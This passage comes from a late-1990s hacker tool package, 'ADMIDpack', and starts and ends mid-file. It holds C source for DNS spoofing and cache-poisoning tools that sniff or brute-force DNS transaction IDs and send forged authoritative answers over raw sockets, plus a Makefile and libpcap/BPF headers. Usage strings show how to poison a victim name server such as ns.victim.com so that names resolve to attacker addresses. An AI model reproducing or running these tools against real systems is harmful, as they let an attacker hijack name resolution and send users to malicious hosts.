ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n"); printf(" well... we going to poison ns.victime.com for they resolv mouhhahaha.hol.fr in 31.3.3.7\n"); printf(" we use provnet.fr and ns1.provnet for find ID of ns.victim.com\n"); printf(" we use ns.isdnet.net for spoof because they have auth on *.hol.fr\n"); printf(" for more information..\n"); printf(" check ftp.janova.org/pub/ADM/ \n"); printf(" mail ADM@janova.org \n"); printf(" ask Heike from me...:) \n"); exit(-1); } void senddnspkt(s,d_ip,wwwname,ip,dns) int s; u_long d_ip; char *wwwname; char *ip; struct dnshdr *dns; { struct sockaddr_in sin; int i; char buffer[1024]; char *data = (char *)(buffer+DNSHDRSIZE); bzero(buffer,sizeof(buffer)); memcpy(buffer,dns,DNSHDRSIZE); if(dns->qr == 0) { i=makepaketQS(data,wwwname,TYPE_A); sin.sin_family = AF_INET; sin.sin_port = htons(53); sin.sin_addr.s_addr = d_ip; sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN); } else { i=makepaketAW(data,wwwname,ip,TYPE_A); sin.sin_family = AF_INET; sin.sin_port = htons(53); sin.sin_addr.s_addr = d_ip; sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN); } } void dns_qs_no_rd(s,d_ip,wwwname,ID) int s; u_long d_ip; char *wwwname; int ID; { struct dnshdr *dns; char *data; char buffer[1024]; int i; dns = (struct dnshdr *)buffer; data = (char *)(buffer+DNSHDRSIZE); bzero(buffer,sizeof(buffer)); dns->id = htons(ID); dns->qr = 0; dns->rd = 0; /* dont want the recusion !! */ dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i=makepaketQS(data,wwwname,TYPE_A); senddnspkt(s,d_ip,wwwname,NULL,dns); } void main(int argc, char **argv) { struct sockaddr_in sin_rcp; struct dnshdr *dns, *dns_recv; char *data, *data2; char buffer2[4000]; char buffer[4000]; char spoofname[255]; char spoofip[255]; char dnstrust[255]; char bla[255]; char *alacon; unsigned char fakename[255]; unsigned char namez[255]; unsigned long s_ip, s_ip2; unsigned long d_ip, d_ip2, trust; unsigned int DA_ID = 65535, loop = 65535; int sraw, s_r, i, on=1, x, ID,timez; int len = sizeof(struct sockaddr); dns_recv = (struct dnshdr *)(buffer); data2 = (char *)(buffer+DNSHDRSIZE); dns = (struct dnshdr *)buffer2; data = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); srand(time(NULL)); if( (s_r=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) == ERROR ){ perror("socket"); exit(ERROR); } if( (fcntl(s_r,F_SETFL,O_NONBLOCK)) == ERROR ){ perror("fcntl"); exit(ERROR); } if ((sraw = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR ){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)){ perror("setsockopt"); exit(ERROR); } if(argc < 2) usage(); if(argc > 9 )DA_ID = loop = atoi(argv[9]); if(argc > 6)strcpy(spoofname,argv[6]); else{ printf("enter the name you wanna spoof:"); scanf("%s",spoofname); } if(argc > 7)strcpy(bla,argv[7]); else{ printf("enter the ip's of the spoof name:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(spoofip,alacon); if( argc > 8 ) strcpy(bla,argv[8]); else{ printf("enter the DNS trust of the victim:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(dnstrust,alacon); printf("ADMnoG00d %s\n",VERSION); printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n"); sleep(1); printf("\nLets Play =)!!\n"); /* save some param */ s_ip2 = host2ip(argv[1]); d_ip2 = d_ip = host2ip(argv[4]); trust = host2ip(argv[2]); s_ip = host2ip(UNDASPOOF); while(1){ sprintf(fakename,"%i%i%i%i%i%i.%s", myrand(), myrand(), myrand(), myrand(), myrand(), myrand(), argv[3]); sendquestion(s_ip,d_ip,fakename,TYPE_A); /* end of question packet */ bzero(buffer2,sizeof(buffer2)); /* RE init some variable */ bzero(namez,sizeof(namez)); i=0; x=0; /* here start the spoof anwser */ ID = loop; for(;loop >= ID-10 ;loop--){ dns->id = htons(loop); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); i=makepaketAW(data,fakename,SPOOFIP,TYPE_A); udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i); } bzero(buffer2,sizeof(buffer2)); /* RE init some variable */ bzero(namez,sizeof(namez)); i=0; x=0; /* time for test spoof */ dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); /* here we sending question */ /* non recursive ! */ /* we waiting for awnser ... */ while(1){ for(timez=0;timez < TIMEOUT; timez++){ if( recvfrom(s_r,buffer,sizeof(buffer),0,(struct sockaddr *)&sin_rcp,&len) != -1 ) { printf("ok whe have the reponse ;)\n"); timez = 0; break; } usleep(10); timez++; } if(timez != 0){ printf("hum no reponse from the NS ressend question..\n"); dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); } else break; } /* ok we have a awnser */ printf("fakename = %s\n",fakename); if(sin_rcp.sin_addr.s_addr == d_ip2 ) if(sin_rcp.sin_port == htons(53) ) { if( dns_recv->qr == 1 ) if( dns_recv->rep_num == 0 ) /* hum we dont have found the right ID */ printf("try %i < ID < %i \n",ID-10,ID); else{ /* Hoho we have the spoof has worked we have found the right ID ! */ printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop); printf("let's send the spoof...\n"); dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5])); printf("spoof sended ...\n"); exit(0); } } /* end of if (sin_rcp.sin_port == htons(53) ) */ bzero(buffer,sizeof(buffer)); } /* end of while loop */ }/* end of proggies */ <--> <++> ADMIDpack/ADMsnOOfID.c #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #include #include #define DNSHDRSIZE 12 #define SPOOF "127.0.0.1" #define VERSION "ver 0.6 pub" #define ERROR -1 int ETHHDRSIZE; void main(argc, argv) int argc; char *argv[]; { struct pcap_pkthdr h; struct pcap *pcap_d; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv,*dnssend; char *data; char *data2; char *buffer; char namefake[255]; char buffer2[1024]; char ebuf[255]; char spoofname[255]; char spoofip[255]; char bla[255]; char dnstrust[255]; char *alacon; unsigned long s_ipns; unsigned long d_ip; int sraw, i, on=1, con, ID,DA_ID,type; srand( (time(NULL) % random() * random()) ); if(argc <2){ printf("usage : %s \n",argv[0]); printf("ex: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr \n",argv[0]); printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. now if som1 asked for the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n"); exit(0); } if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; else ETHHDRSIZE = 14; if(argc>5)type=atoi(argv[5]); if(argc > 6)strcpy(spoofname,argv[6]); else{ printf("enter the name you wanna spoof:"); scanf("%s",spoofname); } if(argc > 7)strcpy(bla,argv[7]); else{ printf("enter the ip's of the spoof name:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(spoofip,alacon); if(argc > 8)strcpy(bla,argv[8]); else{ printf("enter the dns trust for the spoof\n"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(dnstrust,alacon); dnssend = (struct dnshdr *)buffer2; data2 = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION); printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n"); sleep(1); pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf); s_ipns = host2ip(argv[4]); d_ip = host2ip(argv[2]); con = myrand(); /* make the question for get the ID */ sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]); dnssend->id = 2600; dnssend->qr = 0; dnssend->rd = 1; dnssend->aa = 0; dnssend->que_num = htons(1); dnssend->rep_num = htons(0); i = makepaketQS(data2,namefake,TYPE_A); udp_send(sraw, s_ipns, d_ip,2600+con, 53, buffer2, DNSHDRSIZE+i); printf("Question sended...\n"); printf("Its Time to w8 \n"); while(1) { buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE); udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if(ip->protocol == IPPROTO_UDP){ printf("[%s:%i ->",inet_ntoa(ip->saddr),ntohs(udp->source)); printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest)); } if(ip->protocol == 17 ) if(ip->saddr.s_addr == d_ip ) if(ip->daddr.s_addr == s_ipns ) if(udp->dest == htons(53) ) if(dnsrecv->qr == 0 ) { printf("kewl :)~ we have the packet !\n"); ID = dnsrecv->id ; /* we get the id */ printf("the current id of %s is %d \n",argv[2],ntohs(ID)); DA_ID = ntohs(ID); printf("send the spoof...\n"); dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type); printf("spoof sended...\n"); exit(0); } } /* well now we have the ID we cant predict the ID */ } <--> <++> ADMIDpack/ADMsniffID.c #include #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #define ERROR -1 #define DNSHDRSIZE 12 #define VERSION "ver 0.4 pub" int ETHHDRSIZE; void usage(){ printf("usage : ADMsniffID \n"); printf("ex: ADMsniffID eth0 \"127.0.0.1\" \"www.its.me.com\" \n"); exit(ERROR); } void main(int argc, char **argv) { struct pcap_pkthdr h; struct pcap *pcap_d; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv,*dnssend; char *data; char *data2; char *buffer; char SPOOFIP[255]; char bla[255]; char spoofname[255]; char tmp2[255]; char ebuf[255]; char buffer2[1024]; unsigned char namez[255]; int sraw,on=1,tmp1,type; if(argc <2)usage(); if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; else ETHHDRSIZE = 14; strcpy(SPOOFIP,argv[2]); strcpy(spoofname,argv[3]); type = atoi(argv[4]); /* Buffer 'n' tcp/ip stuff */ dnssend = (struct dnshdr *)buffer2; data2 = (char *)(buffer2+12); /* bzero(buffer,sizeof(buffer)); */ bzero(bla,sizeof(bla)); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } /* open pcap descriptor */ pcap_d = pcap_open_live(argv[1],sizeof(buffer),0,100,ebuf); printf("ADMsniffID %s (c) ADMnHeike\n",VERSION); while(1){ buffer =(u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE); udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if(ip->protocol == 17) if(udp->dest == htons(53) ) if(dnsrecv->qr == 0) { strcpy(namez,data); nameformat(namez,bla); printf("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr),(char *)bla); bzero(bla,sizeof(bla)); printf("the question have the type %i and type of the query %i\n" ,ntohs(*((u_short *)(data+strlen(data)+1))) ,ntohs(*((u_short *)(data+strlen(data)+2+1)))); /* well in diz version we only spoof the type 'A' */ /* check out for a new version in ftp.janova.org/pub/ADM */ printf("make the spoof packet...\n"); printf("dns header\n"); /* here we gonna start to make the spoofed paket :)*/ memcpy(dnssend,dnsrecv,DNSHDRSIZE+strlen(namez)+5); dnssend->id=dnsrecv->id; /* haha the ID ;) */ dnssend->aa=1; /* i've the authority */ dnssend->ra=1; /* i've the recusion */ dnssend->qr=1; /* its a awser */ dnssend->rep_num = htons(1); /* i've one awnser */ printf("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n" ,dnssend->id,ntohs(dnssend->que_num),ntohs(dnssend->rep_num)); printf("Question..\n"); printf("domainename=%s\n",data2); printf("type of question=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1)))); printf("type of query=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1+2)))); if( type == TYPE_PTR){ tmp1=strlen(namez)+5; strcpy(data2+tmp1,namez); tmp1=tmp1+strlen(namez)+1; bzero(tmp2,sizeof(tmp2)); nameformat(spoofname,tmp2); printf("tmp2 = %s\n",tmp2); printf(" mouhahahah \n"); *((u_short *)(data2+tmp1)) = htons(TYPE_PTR); *((u_short *)(data2+tmp1+2)) = htons(1); *((u_long *)(data2+tmp1+2+2)) = htonl(86400); *((u_short *)(data2+tmp1+2+2+4)) = htons(strlen((tmp2)+1)); printf("bhaa?.\n"); strcpy((data2+tmp1+2+2+4+2),tmp2); printf(" ouf !! =) \n"); tmp1 = tmp1 +strlen(tmp2)+ 1; } if( type == TYPE_A){ tmp1=strlen(namez)+5; strcpy(data2+tmp1,namez); tmp1=tmp1+strlen(namez)+1; *((u_short *)(data2+tmp1)) = htons(TYPE_A); *((u_short *)(data2+tmp1+2)) = htons(1); *((u_long *)(data2+tmp1+2+2)) = htonl(86400); *((u_short *)(data2+tmp1+2+2+4)) = htons(4); *((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(SPOOFIP); } printf("Answer..\n"); printf("domainname=%s\n",tmp2); printf("type=%i\n",ntohs(*((u_short *)(data2+tmp1)))); printf("classe=%i\n",ntohs(*((u_short *)(data2+tmp1+2)))); printf("time to live=%u\n",ntohl(*((u_long *)(data2+tmp1+2+2)))); printf("resource data lenght=%i\n",ntohs(*((u_short *)(data2+tmp1+2+2+4)))); printf("IP=%s\n",inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2)))); tmp1=tmp1+2+2+4+2+4; /* now tmp1 == the total length of packet dns */ /* without the dnshdr */ udp_send(sraw ,ip->daddr ,ip->saddr ,ntohs(udp->dest) ,ntohs(udp->source) ,buffer2 ,DNSHDRSIZE+tmp1); } /* end of the spoof */ } /* end of while(1) */ } /* The End !! ;) */ <--> <++> ADMIDpack/Makefile # version 0.1 #/usr/contrib/bin/gcc -L. -I. ADMkillDNS.c -lsocket -lnsl -lpcap -o ../ADMbin/ADMkillDNS SHELL = /bin/sh # uncomment this if your are not on LinuX #LIBS = -lsocket -lnsl -lpcap # CC = gcc LIBS = -lpcap BIN = . CFLAGS = -I. -L. all: ADMkillDNS ADMsnOOfID ADMsniffID ADMdnsfuckr ADMnOg00d ADMkillDNS: ADMkillDNS.c $(CC) $(CFLAGS) ADMkillDNS.c $(LIBS) -o $(BIN)/ADMkillDNS ADMsnOOfID: ADMsnOOfID.c $(CC) $(CFLAGS) ADMsnOOfID.c $(LIBS) -o $(BIN)/ADMsnOOfID ADMsniffID: ADMsniffID.c $(CC) $(CFLAGS) ADMsniffID.c $(LIBS) -o $(BIN)/ADMsniffID ADMdnsfuckr: ADMdnsfuckr.c $(CC) $(CFLAGS) ADMdnsfuckr.c $(LIBS) -o $(BIN)/ADMdnsfuckr ADMnOg00d: ADMnOg00d.c $(CC) $(CFLAGS) ADMnOg00d.c $(LIBS) -o $(BIN)/ADMnOg00d clean: rm -f $(BIN)/*o $(BIN)/ADMsniffID $(BIN)/ADMsnOOfID $(BIN)/ADMnOg00d \ $(BIN)/ADMkillDNS $(BIN)/ADMdnsfuckr <--> <++> ADMIDpack/bpf.h /*- * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 * The Regents of the University of California. All rights reserved. * * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)bpf.h 7.1 (Berkeley) 5/7/91 * * @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL) */ #ifndef BPF_MAJOR_VERSION /* BSD style release date */ #define BPF_RELEASE 199606 typedef int bpf_int32; typedef u_int bpf_u_int32; /* * Alignment macros. BPF_WORDALIGN rounds up to the next * even multiple of BPF_ALIGNMENT. */ #define BPF_ALIGNMENT sizeof(bpf_int32) #define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1)) #define BPF_MAXINSNS 512 #define BPF_MAXBUFSIZE 0x8000 #define BPF_MINBUFSIZE 32 /* * Structure for BIOCSETF. */ struct bpf_program { u_int bf_len; struct bpf_insn *bf_insns; }; /* * Struct returned by BIOCGSTATS. */ struct bpf_stat { u_int bs_recv; /* number of packets received */ u_int bs_drop; /* number of packets dropped */ }; /* * Struct return by BIOCVERSION. This represents the version number of * the filter language described by the instruction encodings below. * bpf understands a program iff kernel_major == filter_major && * kernel_minor >= filter_minor, that is, if the value returned by the * running kernel has the same major number and a minor number equal * equal to or less than the filter being downloaded. Otherwise, the * results are undefined, meaning an error may be returned or packets * may be accepted haphazardly. * It has nothing to do with the source code version. */ struct bpf_version { u_short bv_major; u_short bv_minor; }; /* Current version number of filter architecture. */ #define BPF_MAJOR_VERSION 1 #define BPF_MINOR_VERSION 1 /* * BPF ioctls * * The first set is for compatibility with Sun's pcc style * header files. If your using gcc, we assume that you * have run fixincludes so the latter set should work. */ #if (defined(sun) || defined(ibm032)) && !defined(__GNUC__) #define BIOCGBLEN _IOR(B,102, u_int) #define BIOCSBLEN _IOWR(B,102, u_int) #define BIOCSETF _IOW(B,103, struct bpf_program) #define BIOCFLUSH _IO(B,104) #define BIOCPROMISC _IO(B,105) #define BIOCGDLT _IOR(B,106, u_int) #define BIOCGETIF _IOR(B,107, struct ifreq) #define BIOCSETIF _IOW(B,108, struct ifreq) #define BIOCSRTIMEOUT _IOW(B,109, struct timeval) #define BIOCGRTIMEOUT _IOR(B,110, struct timeval) #define BIOCGSTATS _IOR(B,111, struct bpf_stat) #define BIOCIMMEDIATE _IOW(B,112, u_int) #define BIOCVERSION _IOR(B,113, struct bpf_version) #define BIOCSTCPF _IOW(B,114, struct bpf_program) #define BIOCSUDPF _IOW(B,115, struct bpf_program) #else #define BIOCGBLEN _IOR('B',102, u_int) #define BIOCSBLEN _IOWR('B',102, u_int) #define BIOCSETF _IOW('B',103, struct bpf_program) #define BIOCFLUSH _IO('B',104) #define BIOCPROMISC _IO('B',105) #define BIOCGDLT _IOR('B',106, u_int) #define BIOCGETIF _IOR('B',107, struct ifreq) #define BIOCSETIF _IOW('B',108, struct ifreq) #define BIOCSRTIMEOUT _IOW('B',109, struct timeval) #define BIOCGRTIMEOUT _IOR('B',110, struct timeval) #define BIOCGSTATS _IOR('B',111, struct bpf_stat) #define BIOCIMMEDIATE _IOW('B',112, u_int) #define BIOCVERSION _IOR('B',113, struct bpf_version) #define BIOCSTCPF _IOW('B',114, struct bpf_program) #define BIOCSUDPF _IOW('B',115, struct bpf_program) #endif /* * Structure prepended to each packet. */ struct bpf_hdr { struct timeval bh_tstamp; /* time stamp */ bpf_u_int32 bh_caplen; /* length of captured portion */ bpf_u_int32 bh_datalen; /* original length of packet */ u_short bh_hdrlen; /* length of bpf header (this struct plus alignment padding) */ }; /* * Because the structure above is not a multiple of 4 bytes, some compilers * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work. * Only the kernel needs to know about it; applications use bh_hdrlen. */ #ifdef KERNEL #define SIZEOF_BPF_HDR 18 #endif /* * Data-link level type codes. */ #define DLT_NULL 0 /* no link-layer encapsulation */ #define DLT_EN10MB 1 /* Ethernet (10Mb) */ #define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */ #define DLT_AX25 3 /* Amateur Radio AX.25 */ #define DLT_PRONET 4 /* Proteon ProNET Token Ring */ #define DLT_CHAOS 5 /* Chaos */ #define DLT_IEEE802 6 /* IEEE 802 Networks */ #define DLT_ARCNET 7 /* ARCNET */ #define DLT_SLIP 8 /* Serial Line IP */ #define DLT_PPP 9 /* Point-to-point Protocol */ #define DLT_FDDI 10 /* FDDI */ #define DLT_ATM_RFC1483 11 /* LLC/SNAP encapsulated atm */ #define DLT_RAW 12 /* raw IP */ #define DLT_SLIP_BSDOS 13 /* BSD/OS Serial Line IP */ #define DLT_PPP_BSDOS 14 /* BSD/OS Point-to-point Protocol */ /* * The instruction encondings. */ /* instruction classes */ #define BPF_CLASS(code) ((code) & 0x07) #define BPF_LD 0x00 #define BPF_LDX 0x01 #define BPF_ST 0x02 #define BPF_STX 0x03 #define BPF_ALU 0x04 #define BPF_JMP 0x05 #define BPF_RET 0x06 #define BPF_MISC 0x07 /* ld/ldx fields */ #define BPF_SIZE(code) ((code) & 0x18) #define BPF_W 0x00 #define BPF_H 0x08 #define BPF_B 0x10 #define BPF_MODE(code) ((code) & 0xe0) #define BPF_IMM 0x00 #define BPF_ABS 0x20 #define BPF_IND 0x40 #define BPF_MEM 0x60 #define BPF_LEN 0x80 #define BPF_MSH 0xa0 /* alu/jmp fields */ #define BPF_OP(code) ((code) & 0xf0) #define BPF_ADD 0x00 #define BPF_SUB 0x10 #define BPF_MUL 0x20 #define BPF_DIV 0x30 #define BPF_OR 0x40 #define BPF_AND 0x50 #define BPF_LSH 0x60 #define BPF_RSH 0x70 #define BPF_NEG 0x80 #define BPF_JA 0x00 #define BPF_JEQ 0x10 #define BPF_JGT 0x20 #define BPF_JGE 0x30 #define BPF_JSET 0x40 #define BPF_SRC(code) ((code) & 0x08) #define BPF_K 0x00 #define BPF_X 0x08 /* ret - BPF_K and BPF_X also apply */ #define BPF_RVAL(code) ((code) & 0x18) #define BPF_A 0x10 /* misc */ #define BPF_MISCOP(code) ((code) & 0xf8) #define BPF_TAX 0x00 #define BPF_TXA 0x80 /* * The instruction data structure. */ struct bpf_insn { u_short code; u_char jt; u_char jf; bpf_int32 k; }; /* * Macros for insn array initializers. */ #define BPF_STMT(code, k) { (u_short)(code), 0, 0, k } #define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k } #ifdef KERNEL extern u_int bpf_filter(); extern void bpfattach(); extern void bpf_tap(); extern void bpf_mtap(); #else #if __STDC__ extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); #endif #endif /* * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST). */ #define BPF_MEMWORDS 16 #endif <--> <++> ADMIDpack/dns.h #define DNSHDRSIZE 12 struct dnshdr { unsigned short int id; unsigned char rd:1; /* recursion desired */ unsigned char tc:1; /* truncated message */ unsigned char aa:1; /* authoritive answer */ unsigned char opcode:4; /* purpose of message */ unsigned char qr:1; /* response flag */ unsigned char rcode:4; /* response code */ unsigned char unused:2; /* unused bits */ unsigned char pr:1; /* primary server required (non standard) */ unsigned char ra:1; /* recursion available */ unsigned short int que_num; unsigned short int rep_num; unsigned short int num_rr; unsigned short int num_rrsup; }; <--> <++> ADMIDpack/ip.h /* adapted from tcpdump */ #ifndef IPVERSION #define IPVERSION 4 #endif /* IPVERISON */ struct iphdr { u_char ihl:4, /* header length */ version:4; /* version */ u_char tos; /* type of service */ short tot_len; /* total length */ u_short id; /* identification */ short off; /* fragment offset field */ #define IP_DF 0x4000 /* dont fragment flag */ #define IP_MF 0x2000 /* more fragments flag */ u_char ttl; /* time to live */ u_char protocol; /* protocol */ u_short check; /* checksum */ struct in_addr saddr, daddr; /* source and dest address */ }; #ifndef IP_MAXPACKET #define IP_MAXPACKET 65535 #endif /* IP_MAXPACKET */ <--> <++> ADMIDpack/pcap.h /* * Copyright (c) 1993, 1994, 1995, 1996, 1997 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL) */ #ifndef lib_pcap_h #define lib_pcap_h #include #include #include #include #define PCAP_VERSION_MAJOR 2 #define PCAP_VERSION_MINOR 4 #define PCAP_ERRBUF_SIZE 256 /* * Compatibility for systems that have a bpf.h that * predates the bpf typedefs for 64-bit support. */ #if BPF_RELEASE - 0 < 199406 typedef int bpf_int32; typedef u_int bpf_u_int32; #endif typedef struct pcap pcap_t; typedef struct pcap_dumper pcap_dumper_t; /* * The first record in the file contains saved values for some * of the flags used in the printout phases of tcpdump. * Many fields here are 32 bit ints so compilers won't insert unwanted * padding; these files need to be interchangeable across architectures. */ struct pcap_file_header { bpf_u_int32 magic; u_short version_major; u_short version_minor; bpf_int32 thiszone; /* gmt to local correction */ bpf_u_int32 sigfigs; /* accuracy of timestamps */ bpf_u_int32 snaplen; /* max length saved portion of each pkt */ bpf_u_int32 linktype; /* data link type (DLT_*) */ }; /* * Each packet in the dump file is prepended with this generic header. * This gets around the problem of different headers for different * packet interfaces. */ struct pcap_pkthdr { struct timeval ts; /* time stamp */ bpf_u_int32 caplen; /* length of portion present */ bpf_u_int32 len; /* length this packet (off wire) */ }; /* * As returned by the pcap_stats() */ struct pcap_stat { u_int ps_recv; /* number of packets received */ u_int ps_drop; /* number of packets dropped */ u_int ps_ifdrop; /* drops by interface XXX not yet supported */ }; typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *, const u_char *); char *pcap_lookupdev(char *); int pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *); pcap_t *pcap_open_live(char *, int, int, int, char *); pcap_t *pcap_open_offline(const char *, char *); void pcap_close(pcap_t *); int pcap_loop(pcap_t *, int, pcap_handler, u_char *); int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *); const u_char* pcap_next(pcap_t *, struct pcap_pkthdr *); int pcap_stats(pcap_t *, struct pcap_stat *); int pcap_setfilter(pcap_t *, struct bpf_program *); void pcap_perror(pcap_t *, char *); char *pcap_strerror(int); char *pcap_geterr(pcap_t *); int pcap_compile(pcap_t *, struct bpf_program *, char *, int, bpf_u_int32); /* XXX */ int 